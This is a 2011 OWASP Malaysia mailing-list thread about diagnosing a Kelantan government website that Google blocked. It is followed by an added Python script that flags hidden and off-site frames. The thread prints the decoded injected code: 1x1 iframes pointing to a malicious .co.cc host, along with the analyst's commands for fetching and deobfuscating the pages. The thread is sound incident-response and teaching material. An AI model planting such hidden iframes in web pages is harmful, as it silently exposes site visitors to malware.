I am still searching for the source.. last week I asked practical students to upload images on the site... after they had finished the job, then uncle G blocked my site.
I have "quarantined" their laptop... :p

** pity the IT kids of Malaysia. They are only taught to pass exams...

On Wed, Feb 9, 2011 at 9:45 AM, Sharuzzaman Ahmat Raslan <[email protected]> wrote:

> Please check how the line got injected into your system.
>
> You need to find the source of the problem to make sure it will not happen
> again.
>
> On Wed, Feb 9, 2011 at 6:53 AM, Mohd Syamsuri <[email protected]> wrote:
>
>> Mr Adnan thanks for the info and guide..
>>
>> I have cleaned all the mess and the site is up and running again..
>>
>> thanks to all too..
>>
>> ** I will blog this so others can make it as a guide...
>>
>> On Tue, Feb 8, 2011 at 6:00 PM, Adnan bin Mohd Shukor <[email protected]> wrote:
>>
>>> mamp <= LOL typo.. it should be nano
>>> js <= one of the binaries in Spidermonkey. get the patched version
>>> http://blog.didierstevens.com/programs/spidermonkey/ and if you are
>>> working on MacOS/Darwin, apply this patch
>>>
>>> http://blog.xanda.org/2010/10/15/fix-for-spidermonkey-build-issue-in-darwin/
>>>
>>> thanks
>>>
>>> On 8 February 2011 17:56, Sharuzzaman Ahmat Raslan
>>> <[email protected]> wrote:
>>> > I can see 2 interesting apps/scripts:
>>> >
>>> > 1. mamp
>>> > 2. /opt/analysis/js/js
>>> >
>>> > care to share? hopefully it is open source ;)
>>> >
>>> > On Tue, Feb 8, 2011 at 5:50 PM, Adnan bin Mohd Shukor
>>> > <[email protected]> wrote:
>>> >>
>>> >> Here is my bash history:
>>> >>
>>> >> xanda:tmp adnan$ history
>>> >> <snip>
>>> >> 500 cd /tmp
>>> >> 501 wget http:/www2.pkink.gov.my/indexsedc.php
>>> >> 502 wget http://www2.pkink.gov.my/indexsedc.php
>>> >> 503 nano indexsedc.php
>>> >> 504 wget http://www2.pkink.gov.my/indexsedc.php
>>> >> 505 mamp indexsedc.php.1
>>> >> 506 nano indexsedc.php.1
>>> >> 507 wget http://www2.pkink.gov.my/sedc.php
>>> >> 508 nano sedc.php
>>> >> 509 wget http://www2.pkink.gov.my/default.php
>>> >> 510 nano default.php
>>> >> 511 nano default.php
>>> >> 512 clear
>>> >> <I've removed tags and left clean JavaScript inside>
>>> >> 513 mv default.php default.txt
>>> >> 514 /opt/analysis/js/js < default.txt
>>> >> 515 cat write.log
>>> >> 516 history
>>> >> xanda:tmp adnan$
>>> >>
>>> >> Below is the output of the cat:
>>> >> [output]
>>> >> xanda:tmp adnan$ cat write.log
>>> >> <iframe width="1" height="1"
>>> >>
>>> >> src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
>>> "></iframe>"<iframe
>>> >> width="1" height="1"
>>> >>
>>> >> src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
>>> "></iframe>"
>>> >> [/output]
>>> >>
>>> >> Hint: you might use modified version of spidermonkey to 'understand'
>>> >> the javascript
>>> >>
>>> >> Thanks
>>> >>
>>> >> On 8 February 2011 17:38, Mohd Syamsuri <[email protected]> wrote:
>>> >> > thanks for the info..
>>> >> > I will check all the files.
>>> >> >
>>> >> > how did you find it?
>>> >> >
>>> >> > On Tue, Feb 8, 2011 at 5:21 PM, Adnan bin Mohd Shukor
>>> >> > <[email protected]> wrote:
>>> >> >>
>>> >> >> Here is the flow:
>>> >> >>
>>> >> >> 1) your indexsedc.php has an iframe to sedc.php
>>> >> >> 2) and your sedc.php has an iframe to default.php
>>> >> >> 3) and in default.php (look at the last 2 lines), javascript will
>>> >> >> actually create an iframe to
>>> >> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
>>> >> >>
>>> >> >> thanks :)
>>> >> >>
>>> >> >> On 8 February 2011 17:07, Mohd Syamsuri <[email protected]> wrote:
>>> >> >> > can you point...
>>> >> >> > my index.htm or indexsedc.php or other file?
>>> >> >> >
>>> >> >> > On Tue, Feb 8, 2011 at 4:19 PM, Adnan bin Mohd Shukor
>>> >> >> > <[email protected]> wrote:
>>> >> >> >>
>>> >> >> >> you have iframe pointed to
>>> >> >> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
>>> >> >> >>
>>> >> >> >> which is not xss :)
>>> >> >> >>
>>> >> >> >> From my personal point of view, it's either caused by:
>>> >> >> >> 1) malware on pc which has been used for ftp/access to the server
>>> >> >> >> 2) compromised server
>>> >> >> >>
>>> >> >> >> you can send your access.log to [email protected] or
>>> >> >> >> [email protected] for further analysis :)
>>> >> >> >>
>>> >> >> >> thanks
>>> >> >> >>
>>> >> >> >> On 8 February 2011 16:00, Mohd Syamsuri <[email protected]> wrote:
>>> >> >> >> > I have checked it.
>>> >> >> >> > On Tue, Feb 8, 2011 at 3:49 PM, Rasta Boy <[email protected]>
>>> >> >> >> > wrote:
>>> >> >> >> >>
>>> >> >> >> >> Hi Mohd Syamsuri,
>>> >> >> >> >>
>>> >> >> >> >> Why don't you check on the reason why it's being blocked, it might
>>> >> >> >> >> help.
>>> >> >> >> >>
>>> >> >> >> >> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://www.pkink.gov.my/
>>> >> >> >> >>
>>> >> >> >> >> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=AS:4788
>>> >> >> >> >>
>>> >> >> >> >> Regards,
>>> >> >> >> >> Kishur
>>> >> >> >> >>
>>> >> >> >> >> On Tue, Feb 8, 2011 at 3:19 PM, Mohd Syamsuri
>>> >> >> >> >> <[email protected]>
>>> >> >> >> >> wrote:
>>> >> >> >> >>>
>>> >> >> >> >>> Assalamualikum and Good day for my fellow friends.
>>> >> >> >> >>> I need some advice.
>>> >> >> >> >>> Web site Perbadanan kemajuan Iktisad Negeri Kelantan
>>> >> >> >> >>> (http://www.pkink.gov.my) has been blocked by Google for almost
>>> >> >> >> >>> 4 days.
>>> >> >> >> >>> It said that we host malware on our server Malware Detected!
>>> >> >> >> >>> (Google said that!!)
>>> >> >> >> >>> What I did is..
>>> >> >> >> >>> 1. Scan all the data and upload new data
>>> >> >> >> >>> 2. Check the index.html or index.php
>>> >> >> >> >>> 3. Scan using web scanner using
>>> >> >> >> >>> http://www.avgthreatlabs.com/
>>> >> >> >> >>> http://www.virustotal.com
>>> >> >> >> >>> but still get blocked..
>>> >> >> >> >>> Google said Suspected injected code
>>> >> >> >> >>> <FRAME SRC="http://www2.pkink.gov.my/indexsedc.php"
>>> >> >> >> >>> NAME="confcontent"
>>> >> >> >> >>> scrolling=yes >
>>> >> >> >> >>> I have been using this code for almost 2 years
>>> >> >> >> >>> What should I do now?

--
best regard
syamsuri
_______________________________________________
Owasp-Malaysia mailing list
[email protected]
https://lists.owasp.org/mailman/listinfo/owasp-malaysia

OWASP Malaysia Wiki
http://www.owasp.org/index.php/Malaysia

OWASP Malaysia Wiki Facebook
http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
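
An added example, not code from anyone in the thread: a static version of the frame-chain walk described in the quoted messages, run over locally saved copies of the pages to flag 1x1 and off-site frames. The host names, the page contents and the names `FrameFinder` and `walk_frames` are assumptions made for the example; for frames that a script builds at load time, feed it the decoded output (as `write.log` was in the thread) rather than the raw page.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

class FrameFinder(HTMLParser):
    """Collect (absolute src, is_1x1) for every <frame>/<iframe> in a page."""
    def __init__(self, base_url):
        super().__init__()
        self.base_url, self.frames = base_url, []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "").strip() for k, v in attrs}
        if tag in ("frame", "iframe") and a.get("src"):
            tiny = a.get("width") in ("0", "1") and a.get("height") in ("0", "1")
            self.frames.append((urljoin(self.base_url, a["src"]), tiny))

def walk_frames(start_url, pages, own_domain):
    """Follow same-site frames through saved copies; return suspicious ones
    as (containing page, frame src, reason)."""
    findings, seen, queue = [], set(), [start_url]
    while queue:
        url = queue.pop(0)
        if url in seen or url not in pages:
            continue
        seen.add(url)
        finder = FrameFinder(url)
        finder.feed(pages[url])
        for src, tiny in finder.frames:
            host = urlparse(src).hostname or ""
            # Require a dot before the domain so look-alike hosts count as off-site.
            offsite = host != own_domain and not host.endswith("." + own_domain)
            reasons = [r for r, hit in (("off-site", offsite), ("1x1", tiny)) if hit]
            if reasons:
                findings.append((url, src, "+".join(reasons)))
            if not offsite:
                queue.append(src)  # only recurse into pages we host
    return findings

# Constructed sample: placeholder hosts, file names as in the thread.
# default.php holds decoded script output, as write.log did above.
BASE = "http://www2.site.example/"
PAGES = {
    BASE + "indexsedc.php": '<iframe src="sedc.php" width="600" height="400"></iframe>',
    BASE + "sedc.php": '<iframe src="/default.php"></iframe>',
    BASE + "default.php": '<iframe width="1" height="1" '
                          'src="http://offsite.example.net/x"></iframe>',
}

if __name__ == "__main__":
    for page, src, why in walk_frames(BASE + "indexsedc.php", PAGES, "site.example"):
        print(f"{page} -> {src} [{why}]")
```
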

